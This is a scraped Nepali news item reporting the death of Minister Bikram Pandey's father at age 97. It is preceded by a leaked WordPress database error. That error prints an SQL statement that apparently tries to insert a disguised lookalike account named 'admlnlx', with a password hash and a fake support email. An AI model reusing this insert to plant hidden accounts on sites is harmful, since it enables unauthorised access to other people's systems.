WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bu6su1HcSPzalpeAS4AxRJOflp4EOl0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:17:18', '', 'admlnlx', 'admlnlx')
चितवन, माघ १६–
भूमी सुधार तथा व्यवस्था मन्त्री विक्रम पाण्डेलाई पितृ शोक परेको छ ।
मन्त्री पाण्डेका बुबा चन्द्रराज पाण्डेको ९७ वर्षको उमेरमा आज विहान निधन भएको हो । उहाँको काठमाडौंस्थित निवासमा निधन भएको परिवारजनले जनाएको छ । चितवन निवासी पाण्डे परिवार काठमाडौंमा बसोबास गर्दै आईरहेको छ ।
हिजो मात्रै विभिन्न कार्यक्रम लिएर चितवन आउनु भएका मन्त्री पाण्डे दुःखद घटनापछि आज विहानै काठमाडौं प्रस्थान गर्नुभएको छ । स्वर्गीय पाण्डेका ६ छोरा र २ छोरी छन् । मन्त्री पाण्डे छोराहरु मध्यका जेठो हुन् ।